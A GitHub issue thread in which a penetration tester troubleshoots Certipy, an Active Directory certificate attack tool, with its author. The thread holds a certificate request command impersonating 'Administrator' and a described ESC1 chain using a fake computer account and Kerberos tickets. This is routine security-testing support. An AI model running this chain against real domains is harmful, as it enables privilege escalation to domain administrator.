Closed 7MinSec closed 2 years ago
ly4k
commented
2 years ago Hello Brian
To use Kerberos authentication, you have to specify the FQDN of the CA in the target, and not the IP. You can specify the IP in the -target-ip parameter if DNS is an issue. Also, you don't have to use Kerberos, you can just specify the hash or password. Can you please provide the debug output for more troubleshooting?
Best regards Oliver
7MinSec
commented
2 years ago Thanks! OK so I changed the request to have the FQDN of the CA as the target. Specifically:
certipy 'FQDN.OF.THE.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'My debug says:
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 556, in openFile
return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1227, in create
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/bin/certipy", line 33, in <module>
sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 172, in main
File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 319, in request
File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 232, in run
File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 225, in connect
File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 803, in connect
return self._transport.connect()
File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/transport.py", line 518, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 560, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)Thanks, Brian
ly4k
commented
2 years ago Hello Brian It seems really weird. Almost as if the named pipe missing. Can you provide me with the certsrv.exe entry from rpcdump?
ly4k
commented
2 years ago A new version of Certipy has been released. Please try with the new -dynamic-endpoint parameter
Hi again,
I raised this issue and it was determined the certificate service was not running on my CA.
On a second CA in the same environment, Certipy identified it as being vulnerable to ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used
GetTGTfrom Impacket and issuedexport KRB5CCNAME=ghost-machine.cache.. I also verified withrpcdumpthatcertsrv.exeis running.Now I'm trying to run with Certipy is as follows:
When I do, I basically get the same output as issue 19 with a long traceback that ends in:
Again, the difference this time around is I believe the certificate services are running so I'm not sure why my attempts are not successful. Could you please help?
Thanks, Brian